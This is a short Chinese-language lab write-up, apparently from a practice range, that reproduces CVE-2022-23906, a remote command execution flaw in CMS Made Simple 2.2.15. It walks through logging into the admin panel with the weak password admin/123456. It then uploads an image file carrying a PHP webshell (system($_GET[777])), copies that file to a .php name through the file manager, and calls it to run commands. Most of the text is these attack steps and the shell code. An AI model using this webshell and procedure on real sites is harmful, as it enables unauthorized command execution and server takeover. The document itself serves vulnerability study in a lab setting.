漏洞简介:
CMS Made Simple v2.2.15 被发现包含通过上传图片功能的远程命令执行 (RCE) 漏洞。此漏洞通过精心制作的图像文件被利用。
漏洞环境:
春秋云镜中的漏洞靶标,CVE编号为CVE-2022-23906
漏洞复现
后台/admin弱口令登录 admin/123456
文件管理这里可以上传文件
先上传一个php文件发现无法上传
发现可以更改文件名
修改文件名后缀为php失败
图片马可以上传,但是没法利用
<?php
system($_GET[777]);phpinfo();
?>
再试试copy复制文件
复制图片马,修改后缀为.php
直接访问/uploads/yjh.php去执行命令
